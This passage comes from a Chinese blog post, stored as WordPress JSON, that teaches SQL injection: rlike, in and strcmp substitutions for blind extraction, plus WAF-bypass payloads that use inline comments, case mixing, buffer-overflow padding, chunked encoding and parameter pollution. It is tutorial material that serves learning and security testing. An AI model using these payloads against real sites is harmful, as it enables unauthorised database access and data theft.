rlike 
&#8216;\u5927$&#8217;<br><br><strong>5\u3001\u6a21\u7cca\u5339\u914d\u6216\u5173\u7cfb\uff0c\u53c8\u79f0\u5206\u652f\u6761\u4ef6\u3002<\/strong><br>\u5982\uff1a\u67e5\u8be2\u51fa\u5b57\u6bb5\u4e2d\u5305\u542b\u201c\u5e78\u798f\uff0c\u5e78\u8fd0\uff0c\u5e78\u597d\u6216\u5e78\u4e8f\u201d\u7684\u4fe1\u606f\uff1a<br>select * from student where name  rlike &#8216;\u5e78\u798f|\u5e78\u8fd0|\u5e78\u597d|\u5e78\u4e8f&#8217;<\/p>\n<\/blockquote>\n\n\n\n<p>\u6240\u4ee5\u8fd8\u662f\u8fd9\u4e2a\u53e5\u5b50\uff1a<code>SELECT * FROM `test` where id =1 and (substr(database(),1,1)=\"t\")<\/code>\uff0c\u6211\u4eec\u6362\u6210rlike\u6216\u8005regexp\u5c31\u53ef\u7b49\u6548\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM `test` where id =1 and (database() rlike \"^t\")<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">in<\/h2>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u628a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and substr(user(),1,1) ='r'<\/code><\/pre>\n\n\n\n<p>\u66ff\u6362\u6210<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and substr(user(),1,1) in ('r')<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">strcmp()<\/h2>\n\n\n\n<p>strcmp(str1,str2):\u82e5str1&gt;str2\u5219\u8fd4\u56de1\uff0c\u82e5str1=str2\u5219\u8fd4\u56de0\uff0c\u82e5str1&lt;str2\u5219\u8fd4\u56de-1\uff0c\u56e0\u6b64\u8bed\u53e5select * from sheet1 where \u7528\u6237\u540d=&#8221;admin&#8221; and ascii(substr(database(),0,1))=116\u53ef\u4ee5\u7b49\u6548\u66ff\u6362\u6210\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and strcmp(ascii(substr(database(),1,1)),116)<\/code><\/pre>\n\n\n\n<p>\u53ea\u6709ascii(substr(database(),1,1))\u548c116\u76f8\u7b49\u8fd9\u4e2a\u8bed\u53e5\u624d\u4e0d\u4f1a\u6267\u884c\uff0c\u4ee5\u6b64\u5224\u65ad\u662f\u5426\u76f8\u7b49<\/p>\n\n\n\n<h1 
class=\"wp-block-heading\">4.\u7ed5waf<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">\u5185\u8054\u6ce8\u91ca<\/h1>\n\n\n\n<p>\u6211\u4eec\u90fd\u77e5\u9053mysql\u91cc\u53ef\u4ee5\u7528\/**\/\u4f5c\u4e3a\u6ce8\u91ca\u7b26\u4ee3\u66ff\u7a7a\u683c\uff0c\u4e8b\u5b9e\u4e0a\u9664\u4e86\u8fd9\u79cd\u6ce8\u91ca\u7b26\u8fd8\u6709\u4e00\u79cd\u6ce8\u91ca\u7b26\u53eb\u5185\u8054\u6ce8\u91ca\uff0c\u6bd4\u5982\/*!\u5b57\u7b26\u4e32*\/\uff0c<strong>\u800c\u7ecf\u8fc7\u5185\u8054\u6ce8\u91ca\u7684\u8bed\u53e5\u8fd8\u662f\u53ef\u4ee5\u6267\u884c\u7684<\/strong>\uff01\u6bd4\u5982\u8fd9\u4e2a\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select group_concat(table_name) from information_schema.tables where table_schema = database()<\/code><\/pre>\n\n\n\n<p>\u4ed6\u7684\u4f5c\u7528\u662f\u67e5\u8868\uff0c\u4e0d\u7528\u8d58\u8ff0\uff0c\u6211\u4eec\u53ef\u4ee5\u628a\u5b83\u4fee\u6539\u6210\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sEleCt \/*!group_concat(table_name)*\/ FrOM \/*!information_schema.tables*\/ WHERE TaBlE_ScHeMa=\/*%!\"\/*\/database\/*%!\"\/*\/() <\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-25-1024x208.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"208\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-25-1024x208.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1481\"  sizes=\"auto, (max-width: 1024px) 
100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u6211\u4eec\u5bf9group_concat(table_name)\u548cinformation_schema.tables\u90fd\u6253\u4e0a\u4e86\u5185\u8054\u6ce8\u91ca\/*!*\/\uff0c\u5e76\u4e14\u628adatabase()\u6539\u6210\u4e86database\/*%!&#8221;\/*\/()\uff0c\u5bf9\u4e8e\u4e00\u4e9b\u6bd4\u8f83\u4f4e\u80fd\u7684waf\u53ef\u4ee5\u7528\u8fd9\u79cdpayload\u6210\u529f\u7ed5\u8fc7<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7f13\u51b2\u533a\u6ea2\u51fa<\/h1>\n\n\n\n<p>\u5927\u90e8\u5206\u9632\u706b\u5899\u90fd\u662f\u57fa\u4e8eC\/C++\u5f00\u53d1\u7684\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u7f13\u51b2\u533a\u6ea2\u51fa\u4f7f\u7528WAF\u5d29\u6e83<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/www.*.com\/index.php?page_id=-15+and+(select1)=(Select 0xAA&#91;..(add about 1000 \"A\")..])+\/*!uNIOn*\/+\/*!SeLECt*\/+1,2,3,4\u2026.<\/code><\/pre>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u6d4b\u8bd5payload\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?page_id=null%0A\/**\/\/*!50000%55nIOn*\/\/*yoyu*\/all\/**\/%0A\/*!%53eLEct*\/%0A\/*nnaa*\/+1,2,3,4\u2026.<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u4ea7\u751f\u62a5\u9519\u4e00\u822c\u5c31\u8bc1\u660e\u53ef\u4ee5\u7528\u8fd9\u79cd\u65b9\u6cd5\u3002\u5f53\u7136\u7f13\u51b2\u533a\u6ea2\u51fa\u4e5f\u53ef\u4ee5\u7528\u4e8e\u4ea7\u751f\u5e03\u5c14\u6761\u4ef6\u7684\u62a5\u9519\u6761\u4ef6\uff0c\u5982\u864e\u7b26ezsql\u90a3\u9053\u9898\u5b9e\u9645\u4e0a\u5c31\u8fd8\u53ef\u4ee5\u7528\u5927\u91cfA\u6784\u9020\u810f\u6570\u636e\u6784\u9020\u62a5\u9519\u6761\u4ef6\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u5206\u5757\u4f20\u8f93<\/h1>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u5206\u5757\u4f20\u8f93\u7f16\u7801\uff08Chunked transfer 
encoding\uff09\u662fHTTP\u4e2d\u7684\u4e00\u79cd\u6570\u636e\u4f20\u8f93\u673a\u5236\uff0c\u5728HTTP\/1.1\u4e2d\uff0c\u670d\u52a1\u5668\u53d1\u9001\u7ed9\u5ba2\u6237\u7aef\u7684\u6570\u636e\u53ef\u4ee5\u5206\u6210\u591a\u4e2a\u90e8\u5206\uff0c\u5728HTTP\/1.1\u524d\uff0c\u6570\u636e\u7684\u53d1\u9001\u662f\u7531<code>Content-Length<\/code>\u53bb\u51b3\u5b9a\u7684\uff0c\u5b83\u89c4\u5b9a\u4e86\u4e00\u4e2a\u5305\u7684\u957f\u5ea6\uff0c\u670d\u52a1\u5668\u4e5f\u662f\u6309\u7167\u8fd9\u4e2a\u53bb\u8fdb\u884c\u5904\u7406\u7684\u3002\u4f46\u662f\uff0c\u4f7f\u7528\u5206\u5757\u4f20\u8f93\u7684\u65f6\u5019\uff0c\u6570\u636e\u4f1a\u88ab\u5206\u89e3\u51fa\u4e00\u4e2a\u4e2a\u5c0f\u5757\uff0c\u8fd9\u6837\u670d\u52a1\u5668\u5c31\u4e0d\u9700\u8981\u9884\u5148\u77e5\u9053\u603b\u6570\u636e\u7684\u5927\u6982\u957f\u5ea6\uff0c\u63a5\u6536\u5230\u4e00\u4e2a\u4e2a\u5757\u8fdb\u884c\u5904\u7406\u5c31\u884c\u4e86\u3002<br>\u6b63\u5e38\u6211\u4eec\u53d1\u9001\u5f88\u5c0f\u7684\u6570\u636e\u662f\u4e0d\u9700\u8981\u7528\u5230\u5206\u5757\u6280\u672f\u7684\uff0c\u800c\u4e0b\u8f7d\u5927\u6587\u4ef6\uff0c\u6216\u8005\u53d1\u9001\u4e00\u4e9b\u540e\u53f0\u9700\u8981\u5f88\u590d\u6742\u7684\u903b\u8f91\u624d\u80fd\u5904\u7406\u7684\u8bf7\u6c42\u7684\u65f6\u5019\uff0c\u5c31\u9700\u8981\u5b9e\u65f6\u751f\u6210\u6d88\u606f\u957f\u5ea6\uff0c\u670d\u52a1\u5668\u4e00\u822c\u4f1a\u4f7f\u7528Chunked\u7f16\u7801\u3002\u5728\u8fdb\u884c<code>Chunked<\/code>\u7f16\u7801\u8fdb\u884c\u4f20\u8f93\u7684\u65f6\u5019\uff0c\u54cd\u5e94\u5934\u4f1a\u6709<code>Transfer-Encoding: 
Chunked<\/code>\uff0c\u53bb\u8868\u660e\u662f\u4f7f\u7528Chunked\u7f16\u7801\u4f20\u8f93\u5185\u5bb9\u7684\u3002\u5206\u5757\u6280\u672f\u7684\u5177\u4f53\u8fc7\u7a0b\u5c31\u662f\uff0c\u5b9e\u4f53\u76f4\u63a5\u88ab\u5206\u5272\u6210\u591a\u4e2a\u5757\uff0c\u5373\u662f\u5e94\u7528\u5c42\u7684\u6570\u636e\u5728TCP\u4f20\u8f93\u7684\u8fc7\u7a0b\u4e2d\uff0c\u4e0d\u4f5c\u4efb\u4f55\u89e3\u91ca\uff0c\u5168\u90e8\u7406\u89e3\u6210\u4e8c\u8fdb\u5236\u6d41\uff0c\u7136\u540e\u6309\u7167MSS\u7684\u957f\u5ea6\u5207\u5206\uff0c\u7136\u540e\u4e00\u8d77\u538b\u5230TCP\u534f\u8bae\u6808\u91cc\u9762\uff0c\u5269\u4e0b\u7684\u5bf9\u8fd9\u4e9b\u4e8c\u8fdb\u5236\u6570\u636e\u7684\u5177\u4f53\u89e3\u91ca\uff0c\u5219\u4ea4\u7531\u5e94\u7528\u5c42\u89e3\u51b3<\/p>\n<\/blockquote>\n\n\n\n<p>\u53ef\u4ee5\u770b\u770bhttps:\/\/github.com\/c0ny1\/chunked-coding-converter<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">http\u53c2\u6570\u6c61\u67d3<\/h1>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><code>id=1 union select+1,2,3+from+users+where+id=1\u2013<\/code>\u53d8\u4e3a<code>id=1 union select+1&amp;id=2,3+from+users+where+id=1\u2013<\/code><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>\u524d\u8a00 SQL\u6ce8\u5165\u5411\u6765\u662fWeb\u5c0f\u5b50\u6700\u91cd\u8981\u7684\u57fa\u672c\u6280\u80fd\u4e4b\u4e00\uff0c\u57fa\u672c\u4e0a\u6bcf\u6b21\u9762\u8bd5\u9762\u8bd5\u5b98\u90fd\u4f1a\u95ee\u5230SQL\u6ce8\u5165\u76f8\u5173\u7684\u95ee\u9898\uff0c\u4f46\u611f\u89c9 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-1367","post","type-post","status-publish","format-standard","hentry","category-8"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1367","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=1367"}],"version-history":[{"count":71,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1367\/revisions"}],"predecessor-version":[{"id":3228,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1367\/revisions\/3228"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=1367"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=1367"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=1367"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}